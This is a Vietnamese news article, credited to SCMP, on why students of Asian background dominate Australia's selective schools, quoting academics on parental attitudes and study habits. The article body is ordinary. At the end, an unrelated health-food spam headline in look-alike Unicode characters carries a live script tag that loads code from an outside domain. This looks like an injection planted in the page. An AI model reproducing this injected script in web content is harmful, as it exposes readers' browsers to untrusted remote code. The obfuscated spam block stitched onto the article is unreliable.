RSS

Vì sao học sinh gốc Á 'áp đảo' trường điểm Australia

11:30 10/08/2020

Đó không phải là nhờ công lao của các “mẹ hổ” mà do lối tư duy của các bậc phụ huynh châu Á rằng chỉ có giáo dục mới đảm bảo cho tương lai của con cái họ.

Nhìn những bức hình chụp ngày hội trường của một số đại học công danh tiếng nhất ở Sydney cho thấy sự thay đổi về màu da của các học sinh trong 3 thập niên vừa qua. Ban đầu hầu hết là các học sinh da trắng và bây giờ chủ yếu là các học sinh châu Á.

Sinh viên trong một giờ học của Đại học Monash ở Melbourne. Dễ dàng nhận thấy trong số này, sinh viên gốc Á chiếm đa số. Ảnh: Fairfax Media.
Sinh viên trong một giờ học của Đại học Monash ở Melbourne. Dễ dàng nhận thấy trong số này, sinh viên gốc Á chiếm đa số. Ảnh: Fairfax Media.

Con em của các gia đình nhập cư châu Á đã trở thành lực lượng áp đảo, chiếm tới 80-90% số học sinh tại các "trường điểm" cấp trung học không chỉ ở Sydney mà trên toàn Australia. Ở bang New South Wales, các học sinh gốc Á cũng thường xuyên nằm trong danh sách có thành tích cao. Sau khi tốt nghiệp, những học sinh này thường ghi danh vào các trường đại học chuyên ngành đòi hỏi thành tích học rất cao như y khoa, luật và kinh tế.

Không chỉ ở Australia, ở các quốc gia nói tiếng Anh, trong đó có Anh và Mỹ, học sinh gốc Á cũng đạt thành tích rất cao tại các trường trong top đầu.

Theo Christina Ho, giáo sư về khoa học xã hội và chính trị của Đại học công nghệ Sydney, nhiều phụ huynh nhập cư châu Á tin rằng việc học tại các trường điểm sẽ giúp đảm bảo tương lai của con cái họ trong xã hội còn nhiều bất công với người nhập cư.

Nỗi lo sợ của họ là có cơ sở. Kết quả của một nghiên cứu về thị trường lao động năm 2011 cho thấy, để được phỏng vấn xin việc, những người Australia có tên gốc Hoa thường phải nộp số đơn nhiều gấp rưỡi so với những người có tên họ thuần Anh.

Theo bà Ho, đó chính là động lực để các phụ huynh châu Á hướng con mình đến các trường thuộc top đầu.

"Ở các cộng đồng Hàn Quốc, Trung Quốc hay Nam Á, việc học tại các 'trường điểm' còn là vấn đề danh dự. Nếu không được học tại đó, bạn là nỗi xấu hổ của gia đình", bà Ho cho biết.

Trong năm 2020, có hơn 15.000 hồ sơ xin học cạnh tranh nhau để giành 4.200 suất tại 50 trường trung học có tiếng nhất ở New South Wales.

Megan Watkins, giáo sư thuộc Đại học Tây Sydney cho biết, bà đã tìm ra sự tương đồng về thói quen của các gia đình gốc Hoa và những gia đình người da trắng giàu có.

"Điều thú vị ở đây là các phụ huynh gốc Hoa xây dựng cho con cái một thói quen học tập vào một khung giờ nhất định vào mỗi tối. Các hộ gia đình da trắng có địa vị kinh tế xã hội cao cũng có nếp sinh hoạt tương tự. Rất nhiều gia đình giàu có tin rằng điều quan trọng là tạo một thói quen", bà Watkins cho hay.

Cũng theo bà, trẻ em tại các gia đình này được học cách tập trung cho bài tập về nhà. "Sự tập trung là điều cần thiết và đó là kĩ năng không dễ dàng có được", bà nói.

Tại hầu hết các trường điểm, 80-90% học sinh là người gốc Á. Ảnh: Fairfax Media.
Tại hầu hết các "trường điểm", 80-90% học sinh là người gốc Á. Ảnh: Fairfax Media.

Theo giáo sư Ho, sự khác biệt cơ bản về tư duy giáo dục còn được thể hiện ở quan điểm về "năng khiếu" và việc thuê gia sư cho trẻ.

"Các ông bố bà mẹ da trắng thường coi năng khiếu là thứ "vốn sẵn tính trời", trẻ có thể có hoặc không có năng khiếu. Do đó họ phản đối việc trẻ em châu Á được bố mẹ thuê gia sư riêng và cho rằng đó là kiểu học nhồi nhét. Điều đó cho thấy sự khác biệt lớn về tư duy giáo dục giữa phụ huynh da trắng và phụ huynh gốc Á", bà Ho cho hay.

"Đối với người nhập cư gốc Á, năng khiếu không phải là thứ có hay không có. Họ không bao giờ nói về năng khiếu hay tài năng, họ chỉ nói về việc phải học hành chăm chỉ. Rất nhiều người nhập cư không đồng ý với quan niệm về năng khiếu của người phương Tây", bà phân tích.

Giáo sư Watkins cho rằng có ít người hiểu được bản chất sự thành công trong học tập của học sinh gốc Á. Theo bà, giới truyền thông đã tư duy một cách quá máy móc và không am hiểu văn hóa nên nảy sinh định kiến rằng "trẻ em gốc Á bị bắt phải hi sinh thời gian chơi và nhồi nhét kiến thức cho các cuộc thi vào trường điểm".

Trên thực tế, vấn đề chỉ là khác biệt về ưu tiên của các gia đình. Các gia đình gốc Á ưu tiên giáo dục và họ dành không gian và thời gian cho trẻ em học tập.

Bà Watkins cho biết đối với cả các gia đình gốc Hoa không giàu có, "cha mẹ vẫn tạo không gian yên tĩnh cho trẻ tập trung học tập".

Khánh Ngọc (Theo SCMP)

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.